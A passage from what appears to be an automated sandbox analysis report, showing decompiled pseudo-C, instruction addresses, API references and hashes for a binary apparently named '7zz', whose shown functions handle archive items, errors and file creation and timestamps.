									if((_t350 & 0x00000001) != 0) {
										_t351 =  *((intOrPtr*)(_t596 + 0x10));
										 *(_t596 - 0x10) =  *(_t596 - 0x10) & 0x00000000;
										__eflags =  *(_t351 + 8);
										if( *(_t351 + 8) == 0) {
											_t377 = E00408B37(_t469, _t596 - 0xd4);
											__eflags = _t377;
											if(_t377 >= 0) {
												 *(_t596 - 0x10) =  *( *((intOrPtr*)(_t469 + 0x1c)) + _t377 * 4);
											}
										}
										__eflags =  *((char*)(_t596 - 0x40));
										if( *((char*)(_t596 - 0x40)) != 0) {
											L73:
											E0040862D();
											_push( *((intOrPtr*)(_t596 + 0x10)));
											E00409500(_t596 - 0x34);
											__eflags =  *(_t596 - 0x10);
											if(__eflags == 0) {
												_push(_t596 - 0xd4);
												 *(_t596 - 0x10) = _t469;
												E00406796(_t596 - 0x34);
											}
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											_push( *(_t596 + 0x1c));
											_push( *((intOrPtr*)(_t596 - 0x40)));
											_push(_t581);
											_push(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0xd4);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t356 = E00415BCA( *(_t596 - 0x10),  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											__eflags = _t356;
											 *(_t596 - 0x10) = _t356;
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											if(_t356 != 0) {
												 *(_t596 - 4) = 0x19;
												E0040862D();
												 *(_t596 - 4) = 0x11;
												E00408604(_t596 - 0x34);
												_t593 =  *(_t596 - 0x10);
												L83:
												E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
												_t308 = _t596 - 4;
												 *_t308 =  *(_t596 - 4) | 0xffffffff;
												__eflags =  *_t308;
												E00407A18( *((intOrPtr*)(_t596 - 0x74)));
												E0040B154(_t596 - 0x78);
												_t328 = _t593;
												goto L84;
											} else {
												 *(_t596 - 4) = 0x1a;
												goto L77;
											}
										} else {
											__eflags =  *(_t596 - 0x10);
											if( *(_t596 - 0x10) != 0) {
												goto L73;
											}
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											 *(_t596 - 4) = 0x18;
											goto L77;
										}
									} else {
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										 *(_t596 - 4) = 0x17;
										L77:
										E0040862D();
										 *(_t596 - 4) = 0x11;
										E00408604(_t596 - 0x34);
										 *(_t596 - 4) = 0x10;
										E00407A18( *((intOrPtr*)(_t596 - 0xd4)));
										 *(_t596 - 0x38) =  *(_t596 - 0x38) + 1;
										E0040351A(_t596 - 0xd4);
										_push(_t596 - 0x11);
										 *(_t596 - 4) = 0x11;
										_t368 = E0040B5C9(_t596 - 0xfc);
										__eflags = _t368;
										if(_t368 != 0) {
											continue;
										}
										goto L78;
									}
								}
								 *(_t596 - 4) = 0x14;
								E0040862D();
								 *(_t596 - 4) = 0x12;
								E00408604(_t596 - 0x54);
								 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
								 *(_t596 - 4) = 0x15;
								goto L77;
							}
							__eflags =  *(_t596 - 0x38) - 0xff;
							if( *(_t596 - 0x38) != 0xff) {
								goto L60;
							}
							_t573 =  *( *(_t596 + 0x1c));
							 *(_t596 - 0x10) = _t573;
							asm("cdq");
							asm("cdq");
							_t373 =  *( *(_t596 - 0x10))( *((intOrPtr*)(_t581 + 8)), _t573,  *((intOrPtr*)(_t581 + 0x44)), _t573,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
							__eflags = _t373;
							if(_t373 != 0) {
								_t593 = _t373;
								goto L83;
							}
							_t581 =  *((intOrPtr*)(_t596 + 0x14));
							goto L60;
						}
						goto L79;
					}
					__eflags =  *(_t596 + 0x18);
					if( *(_t596 + 0x18) != 0) {
						goto L53;
					}
					__eflags =  *(_t469 + 0x2c);
					if( *(_t469 + 0x2c) <= 0) {
						L15:
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 !=  *(_t469 + 0x2c)) {
							goto L53;
						}
						E00404AD0(_t596 - 0x68, 1);
						 *((intOrPtr*)(_t596 - 0x68)) = 0x47ab08;
						 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
						 *(_t596 + 0x18) =  *(_t596 + 0x18) & 0x00000000;
						__eflags =  *(_t469 + 0x2c);
						if( *(_t469 + 0x2c) <= 0) {
							L37:
							_t388 = 0;
							__eflags =  *(_t469 + 0x18);
							 *(_t596 + 0x18) = 0;
							if( *(_t469 + 0x18) <= 0) {
								L50:
								 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
								E00408604(_t596 - 0x68);
								goto L80;
							} else {
								goto L38;
							}
							do {
								L38:
								__eflags = _t388 -  *((intOrPtr*)(_t596 - 0x60));
								if(_t388 >=  *((intOrPtr*)(_t596 - 0x60))) {
									L40:
									_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4));
									_push( *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4)) + 4);
									E0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
									 *(_t596 - 4) = 9;
									E0040351A(_t596 - 0x9c);
									_push( *((intOrPtr*)(_t596 - 0x20)));
									 *(_t596 - 4) = 0xa;
									_t393 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags);
									__eflags = _t393;
									if(_t393 != 0) {
										_t395 =  *(_t596 - 0xa4) >> 4;
										__eflags = _t395 & 0x00000001;
										if((_t395 & 0x00000001) != 0) {
											E00405B9F(_t596 - 0x54);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											 *(_t596 - 4) = 0xb;
											_push( *(_t596 + 0x1c));
											_push(0);
											_push( *((intOrPtr*)(_t596 + 0x14)));
											_push(_t596 - 0x54);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0x9c);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t585 = E00415BCA(_t584,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											 *(_t596 - 4) = 0xc;
											E0040862D();
											 *(_t596 - 4) = 0xa;
											E00408604(_t596 - 0x54);
											__eflags = _t585;
											if(_t585 != 0) {
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_push( *((intOrPtr*)(_t596 - 0x20)));
												L52:
												E00407A18();
												 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
												E00408604(_t596 - 0x68);
												_t328 = _t585;
												goto L84;
											}
											L48:
											E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
											_t170 = _t596 - 4;
											 *_t170 =  *(_t596 - 4) & 0x00000000;
											__eflags =  *_t170;
											E00407A18( *((intOrPtr*)(_t596 - 0x20)));
											goto L49;
										}
										_push(0x80004005);
										L46:
										E00415C6D( *((intOrPtr*)(_t596 + 0x24)));
										_push(_t596 - 0x20);
										E00406796( *((intOrPtr*)(_t596 + 0x20)));
										goto L48;
									}
									_t411 = E00408C9E(_t584);
									__eflags = _t411;
									if(_t411 == 0) {
										goto L48;
									}
									_push(GetLastError());
									goto L46;
								}
								_t532 =  *((intOrPtr*)(_t596 - 0x5c));
								__eflags =  *((char*)(_t532 + _t388));
								if( *((char*)(_t532 + _t388)) == 0) {
									goto L49;
								}
								goto L40;
								L49:
								_t388 =  *(_t596 + 0x18) + 1;
								__eflags = _t388 -  *(_t469 + 0x18);
								 *(_t596 + 0x18) = _t388;
							} while (_t388 <  *(_t469 + 0x18));
							goto L50;
						} else {
							goto L17;
						}
						do {
							L17:
							_t586 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) +  *(_t596 + 0x18) * 4));
							_t415 =  *((intOrPtr*)( *((intOrPtr*)(_t586 + 0xc))));
							_push(_t415);
							 *((intOrPtr*)(_t596 + 0x10)) = _t415;
							E0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
							 *(_t596 - 4) = 1;
							E0040351A(_t596 - 0x9c);
							_push( *((intOrPtr*)(_t596 - 0x20)));
							 *(_t596 - 4) = 2;
							_t418 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags); // executed
							__eflags = _t418;
							if(_t418 != 0) {
								_t473 =  *(_t596 - 0xa4) >> 0x00000004 & 0x00000001;
								__eflags = _t473;
								if(_t473 == 0) {
									__eflags =  *((char*)(_t586 + 0x15));
									if( *((char*)(_t586 + 0x15)) != 0) {
										L21:
										E00405B9F(_t596 - 0x34);
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										_push(_t596 - 0x9c);
										 *(_t596 - 4) = 3;
										_t421 = E00406796(_t596 - 0x34);
										__eflags = _t473;
										_t424 = E00408E8A( *(_t596 - 0x10), 0, _t596 - 0x34, _t421 & 0xffffff00 | _t473 == 0x00000000);
										__eflags = _t424;
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										if(_t424 == 0) {
											 *(_t596 - 4) = 5;
											E0040862D();
											 *(_t596 - 4) = 2;
											E00408604(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0x14)) + 0x3c);
											_push(_t596 - 0xc4);
											E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
											__eflags = _t473;
											if(_t473 == 0) {
												L35:
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_t116 = _t596 - 4;
												 *_t116 =  *(_t596 - 4) & 0x00000000;
												__eflags =  *_t116;
												E00407A18( *((intOrPtr*)(_t596 - 0x20)));
												_t469 =  *(_t596 - 0x10);
												goto L36;
											}
											E00405B9F(_t596 - 0x8c);
											 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
											 *(_t596 - 4) = 6;
											_t587 = E00408B37( *(_t596 - 0x10),  *((intOrPtr*)(_t596 + 0x10)));
											__eflags = _t587;
											if(_t587 < 0) {
												_push( *((intOrPtr*)(_t596 + 0x10)));
												_t588 =  *(_t596 - 0x10);
												E00406796(_t596 - 0x8c);
												L32:
												_push( *((intOrPtr*)(_t596 + 0x24)));
												_push( *((intOrPtr*)(_t596 + 0x20)));
												_push( *(_t596 + 0x1c));
												_push(1);
												_push( *((intOrPtr*)(_t596 + 0x14)));
												_push(_t596 - 0x8c);
												_push( *((intOrPtr*)(_t596 + 0xc)));
												_push(_t596 - 0x9c);
												_push( *((intOrPtr*)(_t596 + 8)));
												_t585 = E00415BCA(_t588,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
												 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
												__eflags = _t585;
												if(_t585 != 0) {
													 *(_t596 - 4) = 7;
													E0040862D();
													 *(_t596 - 4) = 2;
													E00408604(_t596 - 0x8c);
													E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
													_push( *((intOrPtr*)(_t596 - 0x20)));
													goto L52;
												}
												 *(_t596 - 4) = 8;
												E0040862D();
												 *(_t596 - 4) = 2;
												_t555 = _t596 - 0x8c;
												L34:
												E00408604(_t555);
												goto L35;
											}
											__eflags =  *((intOrPtr*)(_t596 - 0x60)) - _t587;
											if(__eflags > 0) {
												L30:
												 *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) =  *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) & 0x00000000;
												_t588 =  *( *((intOrPtr*)( *(_t596 - 0x10) + 0x1c)) + _t587 * 4);
												goto L32;
											}
											_t476 = _t587 -  *((intOrPtr*)(_t596 - 0x60)) + 1;
											__eflags = _t476;
											do {
												E0043AC2F(_t596 - 0x68, 1);
												_t476 = _t476 - 1;
												__eflags = _t476;
											} while (__eflags != 0);
											goto L30;
										}
										 *(_t596 - 4) = 4;
										E0040862D();
										 *(_t596 - 4) = 2;
										_t555 = _t596 - 0x34;
										goto L34;
									}
									L24:
									E00415C6D( *((intOrPtr*)(_t596 + 0x24)), 0x80004005);
									_push(_t596 - 0x20);
									E00406796( *((intOrPtr*)(_t596 + 0x20)));
									goto L35;
								}
								__eflags =  *((char*)(_t586 + 0x16));
								if( *((char*)(_t586 + 0x16)) == 0) {
									goto L24;
								}
								goto L21;
							}
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push(_t596 - 0x20);
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
							 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
							E00407A18( *((intOrPtr*)(_t596 - 0x20)));
							L36:
							 *(_t596 + 0x18) =  *(_t596 + 0x18) + 1;
							__eflags =  *(_t596 + 0x18) -  *(_t469 + 0x2c);
						} while ( *(_t596 + 0x18) <  *(_t469 + 0x2c));
						goto L37;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_t460 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) + _t590 * 4));
						__eflags =  *((char*)(_t460 + 0x14));
						if( *((char*)(_t460 + 0x14)) != 0) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t460 + 8)) - 1;
						if( *((intOrPtr*)(_t460 + 8)) != 1) {
							goto L15;
						}
						_t564 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0xc))));
						__eflags =  *(_t564 + 4);
						if( *(_t564 + 4) == 0) {
							goto L15;
						}
						_t462 = E00408A3B(_t564);
						__eflags = _t462;
						if(_t462 != 0) {
							goto L15;
						}
						_t590 = _t590 + 1;
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 <  *(_t469 + 0x2c)) {
							continue;
						}
						goto L15;
					}
					goto L15;
				}
				_t581 =  *((intOrPtr*)(_t596 + 0x14));
				_t579 =  *_t568;
				 *(_t596 - 0x38) = _t579;
				asm("cdq");
				asm("cdq");
				_t328 =  *( *(_t596 - 0x38))( *((intOrPtr*)(_t581 + 8)), _t579,  *((intOrPtr*)(_t581 + 0x44)), _t579,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
				if(_t328 == 0) {
					goto L7;
				}
				goto L84;
			}










































                                                                      0x00415425
                                                                      0x00415435
                                                                      0x00415439
                                                                      0x0041543c
                                                                      0x0041543f
                                                                      0x0041544a
                                                                      0x0041544a
                                                                      0x0041544e
                                                                      0x00415453
                                                                      0x00415482
                                                                      0x00415485
                                                                      0x00415485
                                                                      0x00415488
                                                                      0x0041548a
                                                                      0x0041548d
                                                                      0x004158a9
                                                                      0x004158ac
                                                                      0x004158b1
                                                                      0x004158b6
                                                                      0x004158ba
                                                                      0x004158c5
                                                                      0x004158c9
                                                                      0x004158d1
                                                                      0x004158d5
                                                                      0x004158da
                                                                      0x004158e5
                                                                      0x004158f0
                                                                      0x004158f8
                                                                      0x004158fc
                                                                      0x00415901
                                                                      0x00415903
                                                                      0x00415b38
                                                                      0x00415b42
                                                                      0x00415b4a
                                                                      0x00415b4d
                                                                      0x00415b52
                                                                      0x00415b58
                                                                      0x00415b5d
                                                                      0x00415b5d
                                                                      0x00415b5d
                                                                      0x00415b65
                                                                      0x00415b6e
                                                                      0x00415b73
                                                                      0x00415b73
                                                                      0x00415bb9
                                                                      0x00415bbf
                                                                      0x00415bc7
                                                                      0x00415bc7
                                                                      0x0041590e
                                                                      0x0041590e
                                                                      0x00415912
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415918
                                                                      0x0041591c
                                                                      0x00415953
                                                                      0x00415956
                                                                      0x0041595c
                                                                      0x0041595f
                                                                      0x0041596d
                                                                      0x0041596e
                                                                      0x00415972
                                                                      0x0041597d
                                                                      0x0041597e
                                                                      0x00415992
                                                                      0x0041599d
                                                                      0x004159a2
                                                                      0x004159a4
                                                                      0x004159a7
                                                                      0x004159d0
                                                                      0x004159d4
                                                                      0x004159dc
                                                                      0x004159e0
                                                                      0x00415a00
                                                                      0x00415a02
                                                                      0x00415a0d
                                                                      0x00415a14
                                                                      0x00415a15
                                                                      0x00415a20
                                                                      0x00415a23
                                                                      0x00415a25
                                                                      0x00415a27
                                                                      0x00415a27
                                                                      0x00415a25
                                                                      0x00415a31
                                                                      0x00415a34
                                                                      0x00415a36
                                                                      0x00415a44
                                                                      0x00415a47
                                                                      0x00415a4b
                                                                      0x00415a4f
                                                                      0x00415a5a
                                                                      0x00415a5f
                                                                      0x00415a61
                                                                      0x00415a69
                                                                      0x00415a69
                                                                      0x00415a61
                                                                      0x00415a6c
                                                                      0x00415a70
                                                                      0x00415a81
                                                                      0x00415a84
                                                                      0x00415a8c
                                                                      0x00415a8f
                                                                      0x00415a94
                                                                      0x00415a98
                                                                      0x00415aa3
                                                                      0x00415aa4
                                                                      0x00415aa7
                                                                      0x00415aa7
                                                                      0x00415aac
                                                                      0x00415ab8
                                                                      0x00415abb
                                                                      0x00415abe
                                                                      0x00415ac1
                                                                      0x00415ac2
                                                                      0x00415ac3
                                                                      0x00415acc
                                                                      0x00415acd
                                                                      0x00415ad0
                                                                      0x00415ad5
                                                                      0x00415ad7
                                                                      0x00415ada
                                                                      0x00415add
                                                                      0x00415b7e
                                                                      0x00415b82
                                                                      0x00415b8a
                                                                      0x00415b8e
                                                                      0x00415b93
                                                                      0x00415b96
                                                                      0x00415b9c
                                                                      0x00415ba4
                                                                      0x00415ba4
                                                                      0x00415ba4
                                                                      0x00415ba8
                                                                      0x00415bb2
                                                                      0x00415bb7
                                                                      0x00000000
                                                                      0x00415ae3
                                                                      0x00415ae3
                                                                      0x00000000
                                                                      0x00415ae3
                                                                      0x00415a72
                                                                      0x00415a72
                                                                      0x00415a76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415a78
                                                                      0x00415a7b
                                                                      0x00000000
                                                                      0x00415a7b
                                                                      0x00415a38
                                                                      0x00415a38
                                                                      0x00415a3b
                                                                      0x00415ae7
                                                                      0x00415aea
                                                                      0x00415af2
                                                                      0x00415af6
                                                                      0x00415afb
                                                                      0x00415b05
                                                                      0x00415b0a
                                                                      0x00415b14
                                                                      0x00415b1f
                                                                      0x00415b27
                                                                      0x00415b2b
                                                                      0x00415b30
                                                                      0x00415b32
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415b32
                                                                      0x00415a36
                                                                      0x004159ac
                                                                      0x004159b0
                                                                      0x004159b8
                                                                      0x004159bc
                                                                      0x004159c1
                                                                      0x004159c4
                                                                      0x00000000
                                                                      0x004159c4
                                                                      0x0041591e
                                                                      0x00415922
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041592c
                                                                      0x00415934
                                                                      0x00415938
                                                                      0x00415940
                                                                      0x00415946
                                                                      0x00415948
                                                                      0x0041594a
                                                                      0x00415b77
                                                                      0x00000000
                                                                      0x00415b77
                                                                      0x00415950
                                                                      0x00000000
                                                                      0x00415950
                                                                      0x00000000
                                                                      0x0041590e
                                                                      0x00415493
                                                                      0x00415497
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041549d
                                                                      0x004154a0
                                                                      0x004154ce
                                                                      0x004154ce
                                                                      0x004154d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154dc
                                                                      0x004154e1
                                                                      0x004154eb
                                                                      0x004154ef
                                                                      0x004154f8
                                                                      0x004154fa
                                                                      0x00415723
                                                                      0x00415723
                                                                      0x00415725
                                                                      0x00415728
                                                                      0x0041572b
                                                                      0x00415870
                                                                      0x00415870
                                                                      0x00415877
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415731
                                                                      0x00415731
                                                                      0x00415731
                                                                      0x00415734
                                                                      0x00415743
                                                                      0x00415749
                                                                      0x00415752
                                                                      0x00415753
                                                                      0x0041575e
                                                                      0x00415762
                                                                      0x00415767
                                                                      0x00415770
                                                                      0x00415774
                                                                      0x00415779
                                                                      0x0041577b
                                                                      0x004157cc
                                                                      0x004157cf
                                                                      0x004157d1
                                                                      0x004157f1
                                                                      0x004157f6
                                                                      0x004157f9
                                                                      0x00415804
                                                                      0x00415807
                                                                      0x0041580b
                                                                      0x0041580e
                                                                      0x00415810
                                                                      0x00415813
                                                                      0x0041581a
                                                                      0x0041581d
                                                                      0x0041581e
                                                                      0x00415826
                                                                      0x00415828
                                                                      0x0041582e
                                                                      0x00415832
                                                                      0x0041583a
                                                                      0x0041583e
                                                                      0x00415843
                                                                      0x00415845
                                                                      0x00415887
                                                                      0x0041588c
                                                                      0x0041588f
                                                                      0x0041588f
                                                                      0x00415894
                                                                      0x0041589d
                                                                      0x004158a2
                                                                      0x00000000
                                                                      0x004158a2
                                                                      0x00415847
                                                                      0x0041584d
                                                                      0x00415855
                                                                      0x00415855
                                                                      0x00415855
                                                                      0x00415859
                                                                      0x00000000
                                                                      0x0041585f
                                                                      0x004157d3
                                                                      0x004157d8
                                                                      0x004157db
                                                                      0x004157e6
                                                                      0x004157e7
                                                                      0x00000000
                                                                      0x004157e7
                                                                      0x0041577f
                                                                      0x00415784
                                                                      0x00415786
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415792
                                                                      0x00000000
                                                                      0x00415792
                                                                      0x00415736
                                                                      0x00415739
                                                                      0x0041573d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415860
                                                                      0x00415863
                                                                      0x00415864
                                                                      0x00415867
                                                                      0x00415867
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415500
                                                                      0x00415500
                                                                      0x00415509
                                                                      0x00415512
                                                                      0x00415514
                                                                      0x00415515
                                                                      0x00415518
                                                                      0x00415523
                                                                      0x00415527
                                                                      0x0041552c
                                                                      0x00415535
                                                                      0x00415539
                                                                      0x0041553e
                                                                      0x00415540
                                                                      0x00415584
                                                                      0x00415584
                                                                      0x00415587
                                                                      0x004155e0
                                                                      0x004155e4
                                                                      0x0041558f
                                                                      0x00415592
                                                                      0x00415597
                                                                      0x004155a3
                                                                      0x004155a4
                                                                      0x004155a8
                                                                      0x004155ad
                                                                      0x004155bc
                                                                      0x004155c1
                                                                      0x004155c3
                                                                      0x004155c6
                                                                      0x00415607
                                                                      0x0041560b
                                                                      0x00415613
                                                                      0x00415617
                                                                      0x00415628
                                                                      0x0041562f
                                                                      0x00415630
                                                                      0x00415635
                                                                      0x00415637
                                                                      0x004156f8
                                                                      0x004156fe
                                                                      0x00415706
                                                                      0x00415706
                                                                      0x00415706
                                                                      0x0041570a
                                                                      0x0041570f
                                                                      0x00000000
                                                                      0x00415713
                                                                      0x00415643
                                                                      0x00415648
                                                                      0x00415654
                                                                      0x0041565d
                                                                      0x0041565f
                                                                      0x00415661
                                                                      0x0041568d
                                                                      0x00415690
                                                                      0x00415699
                                                                      0x0041569e
                                                                      0x0041569e
                                                                      0x004156ac
                                                                      0x004156af
                                                                      0x004156b2
                                                                      0x004156b4
                                                                      0x004156b7
                                                                      0x004156be
                                                                      0x004156c1
                                                                      0x004156c2
                                                                      0x004156ca
                                                                      0x004156cc
                                                                      0x004156d2
                                                                      0x004156d4
                                                                      0x0041579b
                                                                      0x0041579f
                                                                      0x004157aa
                                                                      0x004157ae
                                                                      0x004157b9
                                                                      0x004157be
                                                                      0x00000000
                                                                      0x004157be
                                                                      0x004156e0
                                                                      0x004156e4
                                                                      0x004156e9
                                                                      0x004156ed
                                                                      0x004156f3
                                                                      0x004156f3
                                                                      0x00000000
                                                                      0x004156f3
                                                                      0x00415663
                                                                      0x00415666
                                                                      0x0041567b
                                                                      0x0041567e
                                                                      0x00415688
                                                                      0x00000000
                                                                      0x00415688
                                                                      0x0041566d
                                                                      0x0041566d
                                                                      0x0041566e
                                                                      0x00415673
                                                                      0x00415678
                                                                      0x00415678
                                                                      0x00415678
                                                                      0x00000000
                                                                      0x0041566e
                                                                      0x004155cb
                                                                      0x004155cf
                                                                      0x004155d4
                                                                      0x004155d8
                                                                      0x00000000
                                                                      0x004155d8
                                                                      0x004155e6
                                                                      0x004155ee
                                                                      0x004155f9
                                                                      0x004155fa
                                                                      0x00000000
                                                                      0x004155fa
                                                                      0x00415589
                                                                      0x0041558d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041558d
                                                                      0x0041554c
                                                                      0x00415557
                                                                      0x00415558
                                                                      0x00415563
                                                                      0x0041556b
                                                                      0x0041556f
                                                                      0x00415714
                                                                      0x00415714
                                                                      0x0041571a
                                                                      0x0041571a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154a2
                                                                      0x004154a2
                                                                      0x004154a5
                                                                      0x004154a8
                                                                      0x004154ac
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154ae
                                                                      0x004154b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154b7
                                                                      0x004154b9
                                                                      0x004154bd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154bf
                                                                      0x004154c4
                                                                      0x004154c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154c8
                                                                      0x004154c9
                                                                      0x004154cc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004154cc
                                                                      0x00000000
                                                                      0x004154a2
                                                                      0x00415458
                                                                      0x0041545b
                                                                      0x00415465
                                                                      0x00415468
                                                                      0x00415471
                                                                      0x00415477
                                                                      0x0041547b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00415425
                                                                      • GetLastError.KERNEL32(00000000,?,00000001,?,59@,00000000), ref: 00415542
                                                                      • GetLastError.KERNEL32(?,?,00000000,0000002A,?,59@,00000000), ref: 00415B38
                                                                      • GetLastError.KERNEL32(00000000,00000000,00000001,?,59@,00000000), ref: 0041578C
                                                                        • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                        • Part of subcall function 004092A8: __EH_prolog.LIBCMT ref: 004092AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast
                                                                      • String ID: 59@
                                                                      • API String ID: 1057991267-2780377667
                                                                      • Opcode ID: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                      • Instruction ID: 1d40638168d81cf388170db04f18bdef8ab4a9340640ae64ab53dda31c2c3f9c
                                                                      • Opcode Fuzzy Hash: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                      • Instruction Fuzzy Hash: 6C428D7090424DEFDF11DFA0C981BEDBBB5AF54308F1041AAE84577292DB38AE85CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004098CF Relevance: 9.1, APIs: 6, Instructions: 73filetimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1464 4098cf-4098e9 call 46b890 1467 4098fa-409920 CreateFileW 1464->1467 1468 4098eb-4098f5 SetLastError 1464->1468 1469 409922-409948 call 401e9a call 40b863 1467->1469 1470 409965-40996b 1467->1470 1471 409992-40999d 1468->1471 1478 40994a-409959 CreateFileW 1469->1478 1479 40995c-409964 call 407a18 1469->1479 1473 40998d-409991 1470->1473 1474 40996d-409987 SetFileTime CloseHandle 1470->1474 1473->1471 1474->1473 1478->1479 1479->1470
                                                                      C-Code - Quality: 100%
                                                                      			E004098CF(WCHAR* __ecx, FILETIME* __edx) {
				void* _t26;
				signed int _t27;
				int _t28;
				signed int _t37;
				void* _t52;

				E0046B890(E00473A10, _t52);
				 *(_t52 - 0x18) = __edx;
				 *((intOrPtr*)(_t52 - 0x14)) = __ecx;
				if( *0x490a7c != 0) {
					_t26 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					 *(_t52 - 0x10) = _t26;
					if(_t26 == 0xffffffff) {
						 *(_t52 - 0x24) = 0;
						 *((intOrPtr*)(_t52 - 0x20)) = 0;
						 *((intOrPtr*)(_t52 - 0x1c)) = 0;
						E00401E9A(_t52 - 0x24, 3);
						 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
						if(E0040B863(_t52 - 0x24) != 0) {
							 *(_t52 - 0x10) = CreateFileW( *(_t52 - 0x24), 0x40000000, 3, 0, 3, 0x2000000, 0);
						}
						E00407A18( *(_t52 - 0x24));
					}
					_t37 = 0;
